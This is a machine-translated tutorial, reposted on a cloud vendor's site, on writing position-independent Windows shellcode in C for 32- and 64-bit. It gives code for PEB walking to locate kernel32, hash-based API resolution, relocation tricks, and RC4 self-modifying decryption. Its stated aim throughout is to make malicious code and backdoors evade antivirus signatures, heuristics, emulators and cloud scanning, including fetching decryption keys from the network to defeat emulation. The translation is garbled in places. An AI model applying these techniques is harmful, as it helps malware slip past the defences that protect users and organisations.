Advanced shellcode Programming Technology on windows

Source: Internet
Author: User

Advanced shellcode Programming Technology on windows

Preface

Concept of binary function shellcode

3. Selection of advanced languages

Iv. x86 c2shellcode framework

5x64 c2shellcode framework

Summary

7. Thank you

Preface

The technology described in this article has been used in practice for a long time, but it has not been documented for some reasons. This article provides code implementation for the key points and adds some new understandings from the author.

The directory structure of the test code is as follows:

Test1: 32-bit 64-bit shellcode and corresponding test tool

Test2: x86 c2shellcode framework

Test3: shellcode writing skills of the dup command placeholder. text Segment

Test4: implement secondary SMC of shellcode

Test5: x64 c2shellcode framework

Concept of binary function shellcode

This is an age of intense attack and defense. Anti-Virus Software's detection and removal technology is three-dimensional, with signatures, clouds, home defenses, inspiration, and virtual machines. If the malicious code is restricted to a fixed PE format, it cannot be quickly muttered or killed. This requires that the malicious code should be able to escape static detection after simple processing, and the loader of windows can be loaded and run independently. Shellcode exactly fits this form. The shellcode mentioned in this article is not a shellcode that is traditionally used in scenarios where the length is prone to demanding requirements, but may contain thousands or tens of thousands of lines of source code, however, when the EIP of CopyMemory points to the past, the binary code that runs can be loaded, which is called the functional shellcode. Obviously, because of the number of lines of code or functional requirements, it is not cost-effective to write functional shellcode using pure assembly.

3. Selection of advanced languages

1. Use delphi to write the functional shellcode

Currently, the popular shellcode compiler is mainly delphi and vc. A Brief Introduction to delphi: Due to the Borland compiler, the string constant is not placed in the Data Segment during compilation, but behind the function. It is much easier to process strings than VC, in addition, delphi supports X64 inline assembly, making it even more powerful to write X64 shellcode. Early predecessors in the circle, such as Anskya (Queen) xfish, generally use delphi to compile functional shellcode.

2. Use VC to write the functional shellcode

The test1 directory contains two binary codes: 32shellcode. bin and 64shellcode. bin. There are two segments of shellcode that can run on x86 and x64 respectively. You can enable the debugview tool to capture logs. Run the following command to test two segments of shellcode.

32runbin.exe 32shellcode. bin

64runbin.exe 64shellcode. bin

If it is an x64 system, 32shellcode. bin will also run very robust on wow64.

Next we will introduce the functional shellcode written by VC.

Iv. x86 c2shellcode framework

1 c2shellcode framework Overview

This is a 32-bit shellcode framework generated using VS2008. You can easily call native APIs and ring3 APIs in shellcode. After the HHL_DEBUG switch is commented out, run the generated EXE to generate shellcode.

Let's take a look at this project.

    void main(){#ifdef  HHL_DEBUG    InitApiHashToStruct();    ShellCode_Start();#else    InitApiHashToStruct();#endif}

The Main function is simple and defines a debugging switch. This debug switch affects the global structure of ShellData. When this switch is commented out, ShellData will be attached to the tail of shellcode. Enabling ShellData exists in the. data Segment to facilitate C source code Debugging Using vc ide.

2. Function execution process after the HHL_DEBUG debug switch is enabled

2.1 fill in the hash function into the ShellData struct

The first is the InitApiHashToStruct function. Here is a more traditional shift generation hash function, you can call GetRolHash to directly pass the string for hash generation, or you can batch directly fill the hash into the ShellData struct.

DWORD GetRolHash(char *lpszBuffer){    DWORD dwHash = 0;    while(*lpszBuffer)    {        dwHash = (    (dwHash <<25 ) | (dwHash>>7) );        dwHash = dwHash+*lpszBuffer;        lpszBuffer++;    }    return dwHash;}

2.2 scan and export the table based on the function hash to obtain the function address

The ShellCode_Start function directly redirects to ShellCodeEntry and starts to execute shellcode.

__declspec(naked) void ShellCode_Start(){    __asm    {        jmp ShellCodeEntry    }}

Note that the local string is defined in the ShellCodeEntry function. Check with IDA.

PVOID ShellCodeEntry(){    char hhl[]={'h','e','l','l','o','g','i','r','l',0};#ifndef HHL_DEBUG    DWORD    offset=ReleaseRebaseShellCode();    PShellData     lpData= (PShellData)(offset + (DWORD)Shellcode_Final_End);#endif    GetRing3ApiAddr();    lpData->xOutputDebugStringA(hhl);    return (PVOID)lpData;}

We can see that the defined string in this way is the parameter transfer in the. text Segment by means of the Pressure stack, rather than in the. data Segment.

 

The GetRing3ApiAddr function is mainly responsible

1. Get the kernel32 base address through the get_k32base_peb () function.

2. Use the get_ntdllbase_peb () function to obtain the base address of ntdll. You can also directly use the LoadLibrary function to load ntdll.

3. Obtain the addresses of loadlibrary and getprocaddress functions.

4. Load other required modules, such as paspi advapi32, to obtain the base address.

5. Pass the hash of the specified function and the base address of the specified module to the Hash_GetProcAddress function, parse and export the table, obtain the address of the specified function, and fill it in the ShellData struct.

    __declspec(naked) DWORD get_k32base_peb(){    __asm    {            mov   eax, fs:[030h]                        test  eax,eax                            js    finished                                mov   eax, [eax + 0ch]                        mov   eax, [eax + 14h]                        mov   eax, [eax]                            mov   eax, [eax]            mov   eax, [eax + 10h]finished:        ret    }}

This code can be used to obtain the basic address of kernel32 in winxp-win8.1.

2.3 pass related parameters and call the function address to implement corresponding functions.

Finally, OutPutDebugStringA is called to test the shellcode output by a string.

LpData-> xOutputDebugStringA (hhl );

3. Block the function execution process after the HHL_DEBUG debug switch.

#ifndef HHL_DEBUG    dwSize = (DWORD)Shellcode_Final_End - (DWORD)ShellCode_Start;    dwShellCodeSize = dwSize + sizeof(TShellData);    lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED,dwShellCodeSize);    if(lpBuffer)    {        CopyMemory(lpBuffer,ShellCode_Start,dwSize);        CopyMemory(lpBuffer+dwSize,&ShellData,sizeof(TShellData));        hFile = CreateFileA("GetRing3ApiAddr.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0);        if(hFile != INVALID_HANDLE_VALUE)        {            if(WriteFile(hFile,lpBuffer,dwShellCodeSize,&dwBytes,NULL))            {                printf("Save ShellCode Success.\n");            }            CloseHandle(hFile);        }        GlobalFree(lpBuffer);    }#endif

We can see that after the HHL_DEBUG switch is commented out, we just copied the specified memory area. But how do we determine which region to copy.

4. How to Determine the start and end of Shellcode

Drag the generated PE file to IDA, and you can see the start and end addresses of the binary code.

You only need to copy the ShellCode_Start to the end of the InitApiHashToStruct function.

5 c2shellcode notes

1. the jump-related commands should be relatively redirected,

2. Avoid storing strings in. data segments.

3. Properly process global variables.

In the c2shellcode framework, global variables are stored in TShellData. Then, through relocation, the lpData pointer is used for indexing for shellcode to call. When TShellData is indexed, it needs to be relocated. The relocated function is ReleaseRebaseShellCode.

DWORD ReleaseRebaseShellCode(){    DWORD     dwOffset;    __asm    {        call  GetEIPGetEIP:        pop   eax                                sub   eax, offset GetEIP            mov   dwOffset, eax    }    return dwOffset;}

The pointer is indexed to TShellData by adding the relevant offset to store the global variables of shellcode.

1

PShellData lpData = (PShellData) (offset + (DWORD) Shellcode_Final_End );

Index tshelldata

 

6 advantages of using advanced languages to write shellcode

The advantage of writing shellcode in advanced languages is that you do not need to care about the stack balance, and you can use the compilation optimization option to reduce the shellcode size when generating shellcode.

Debugging has extremely powerful advantages. You only need to care about the implementation of malicious code functions, and you do not need to worry about trivial details. For example, whether the function address can be correctly obtained can greatly enhance the readability of the source code. It shows the shellcode debugging Based on C source code in the vc ide after loading the symbol table. You can see at a glance whether the function address in the struct has been correctly filled.

7 shellcode coding skills for C call ASM and dup command placeholder text segments

The c2shellcode framework in Test2 attaches the global struct to the end of shellcode, but this is not necessary. The VC compiler allows asm call c and c call asm. This function supports 32-bit and 64-bit platforms and the related code is in the test3 directory.

. 386

. Model flat, c

. Code

Public AsmShellData

Public AsmChar

Public hellohhl

AsmShellData proc

Byte 2000 dup (8)

AsmShellData endp

AsmChar proc

Byte 2000 dup (6)

AsmChar endp

Hellohhl proc

Sztext db 'hellohhl', 0

Hellohhl endp

End

This is the compilation code.

In AsmShellData, the dup command occupies a placeholder for the. text Segment, occupying 2000 bytes.

0 is not recommended for placeholder here, because an additional. bss segment will be added when the obj file is linked. 0 indicates no initialization. The. bss segment is used to store data that is not initialized.

We can see several newly exported functions in the ASM file.

AsmShellData dup command placeholder is used to store global variables of shellcode.

The AsmChar dup command placeholder is used to store the global string of shellcode.

Hellohhl is used to mark the end of shellcode.

Note that two new macros are defined.

# Define shellcode_final_end hellohhl

# Define shellcode_final_start ShellCode_Start

Why is that defined. Load IDA.

We can clearly see the start and end of shellcode. You only need to copy the shellcode_start code to hellohhl to get the shellcode.

#ifndef HHL_DEBUG    b1=VirtualProtect(AsmShellData,sizeof(TShellData),PAGE_EXECUTE_READWRITE,&dwOldProtect);    CopyMemory(AsmShellData,&ShellData,sizeof(TShellData));    dwSize = (DWORD)shellcode_final_end - (DWORD)shellcode_final_start;    lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED,dwSize);    if(lpBuffer)    {        CopyMemory(lpBuffer,shellcode_final_start,dwSize);        hFile = CreateFileA("hhlsh.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);        if(hFile != INVALID_HANDLE_VALUE)        {            if(WriteFile(hFile,lpBuffer,dwSize,&dwBytes,NULL))            {                printf("Save ShellCode Success.\n");            }            CloseHandle(hFile);        }        GlobalFree(lpBuffer);    }#endif

Because the placeholder AsmShellData using the dup command is located in. in the text segment, you must first use VirtualProtect to change the Memory attribute, and then copy the global variables into this space. You still need to relocate the code, but this time you can point the pointer to AsmShellData.

#ifndef HHL_DEBUG    DWORD        offset=ReleaseRebaseShellCode();    PShellData     lpData= (PShellData)((DWORD)AsmShellData+offset); #endif

We can see that the memory is allocated only once, and we do not need to copy the ShellData struct to the end of shellcode.

8. Implement SMC multiple times in shellcode

You may find that shellcode is based on SMC technology from the very beginning. A large piece of code segment stores hash, and this piece of code segment that stores hash will modify itself into a function address during running, but you may not be completely satisfied with the technology of a single SMC.

I do not intend to use the traditional xor encryption method for self-decryption of shellcode. This time, we use standard RC4 for shellcode self-decryption. This project is located in the test4 directory. You can observe how to add code to c2shellcode. If you want to, you can set some conditions to write a loop so that shellcode can be decrypted by 4 bytes. I believe this will increase the threshold for reverse analysis.

In the shellcode_ntapi_utility.h header file, we added two new RC4 encryption and decryption functions for shellcode to call.

We use hellogirl as the key to encrypt the hash region when generating the shellcode.

At the beginning of shellcode Execution, the hash region is decrypted one by one, and the hash region is restored to the original API address by SMC again.

 

Run runbin.exe hhlsh. bin shellcode to use RC4 to output the familiar string from debugview again after self-decryption.

The related code is in the test4 directory and will not be analyzed in detail here.

5x64 c2shellcode framework

I do not recommend that you mix a 32-bit project and a 64-bit project with preprocessing instructions in the same project.

The 64-bit c2shellcode is located in the test5 Directory, which is different from the 32-bit shellcode.

We will continue to introduce the c2shellcode framework below x64 from the main function.

void main(){#ifdef  HHL_DEBUG    InitApiHashToStruct();    AlignRSPAndCallShEntry();#else    InitApiHashToStruct();#endif}

Like the 32-bit c2shellcode framework, the InitApiHashToStruct function is used to populate the hash data into the ShellData struct.

The entry function of shellcode is a function exported from ASM.

First, let's take a look at the code in the asm file. The AlignRSPAndCallShEntry function is responsible for making a 16-bit alignment. Otherwise, the program will Crash once the 128-bit XMM register is called. Execute the 64-bit shellcode directly after the alignment is completed.

EXTRN ShellCode_Entry:PROC   ;this function is in cPUBLIC  AlignRSPAndCallShEntry   AlignRSPAndCallShEntry PROC push rsi                         mov  rsi, rsp                     and  rsp, 0FFFFFFFFFFFFFFF0h     sub  rsp, 020h                     call ShellCode_Entry             mov  rsp, rsi                     pop  rsi                         ret                            AlignRSPAndCallShEntry ENDP

You can see that in the AlignRSPAndCallShEntry function, with the help of asm call c, we return to the C function ShellCode_Entry to start code execution.

PVOID ShellCode_Entry(){    char hhl[]={'h','e','l','l','o','h','h','l',0};#ifndef HHL_DEBUG    PShellData     lpData= (PShellData)((ULONG64)Shellcode_Final_End)#endif    GetRing3ApiAddr();    lpData->xOutputDebugStringA(hhl);    return (PVOID)lpData;}

In the 64-bit above, we still need to get the base address of kernel32 and then parse and export the table to get the address of the relevant function.

PUBLIC get_kernel32_peb_64get_kernel32_peb_64 PROCmov rax,30hmov rax,gs:[rax] ;mov rax,[rax+60h] ;mov rax, [rax+18h] ;mov rax, [rax+10h] ;mov rax,[rax] ;mov rax,[rax] ;mov rax,[rax+30h] ;DllBaseretget_kernel32_peb_64 ENDP

The above code can be more common on the X64 win7-win8.1 system above get the kernel32 base address.

We still need to relocate the shellcode when removing the HHL_DEBUG switch to generate the shellcode. Because of the relative addressing of RIP under the 64-bit processor, we only need to use the end region of shellcode to determine the ShellDat as the global variable.

PShellData lpData = (PShellData) (ULONG64) Shellcode_Final_End );

When the shellcode is generated, we only need to copy the binary code of the specified region to the shellcode. Here, we still use the method that ShellData attaches to the tail of shellcode to process global variables. If you want to, you can still use the dup command to process global variables in the placeholder text segment.

dwSize = (ULONG64)Shellcode_Final_End - (ULONG64)Shellcode_Final_Start;    dwShellCodeSize = dwSize + sizeof(TShellData);    lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED,dwShellCodeSize);    if(lpBuffer)    {        CopyMemory(lpBuffer,Shellcode_Final_Start,dwSize);        CopyMemory(lpBuffer+dwSize,&ShellData,sizeof(TShellData));        hFile = CreateFileA("64shellcode.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);        if(hFile != INVALID_HANDLE_VALUE)        {            if(WriteFile(hFile,lpBuffer,dwShellCodeSize,&dwBytes,NULL))            {                printf("Save ShellCode Success.\n");            }            CloseHandle(hFile);        }        GlobalFree(lpBuffer);    }

Still on IDA.

PUBLIC MyShellCodeFinalEndMyShellCodeFinalEnd PROC    xor rax,rax    retMyShellCodeFinalEnd ENDPEND

We can see that the binary value between ShellCode_Start and MyShellcodeFinalEnd is shellcode.

Summary

If you can read c2shellcode, you will feel that c2shellcode is nothing new. With some features of the compiler (for example, inline compilation dup command placeholder text segment), start and end of the global string variable shellcode are easily processed.

What is shellcode or code or data is shellcode as long as the binary code is irrelevant to the location. No matter what compiler you use, the GCC or the delphi compiler or the VC compiler, as long as the binary output is irrelevant to the location or the binary output is irrelevant to the location through post-processing, it is shellcode.

The functional shellcode is mainly used to quickly defend against anti-virus software.

Malicious Code is encapsulated into the shellcode protection code and cloud

Code self-modification technology multi-layer SMC confrontation inspiration and virtual machines and clouds

Random Code segment and PE structure. Fight Against Soft PE Structure detection and removal and cloud

Whitelist technology defends against foreign anti-DDoS attacks

1. About Multi-layer SMC

Because the hash region (ShellData) storing this API address needs to be decrypted multiple times (key) to restore the real API address. In addition, the api addresses of malicious code are all derived from the ShellData region. We can easily write the key into a registry key value or binfile, or collect packets from the network to receive the key for SMC, soft killer virtual machines cannot simulate API calls with malicious code.

2. About the random code segment and PE structure.

The following command is used for existing methods.

# Pragma code_seg (push, r2, ". test ")

Some your backdoor code

# Pragma code_seg (pop, r2)

Add your malicious code to A. test segment or use the following command to merge the segments.

# Pragma comment (linker, "/MERGE:. rdata =. data") // MERGE rdata segments into data segments

# Pragma comment (linker, "/MERGE:. text =. data") // MERGE text segments into data segments

# Pragma comment (linker, "/MERGE:. reloc =. data" // MERGE reloc segments into data segments

It is easy to determine that the PE is manually modified and will be inspired to take the PE structure.

The dup command occupies the. text Segment and works with SMC to control almost every byte of malicious code.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.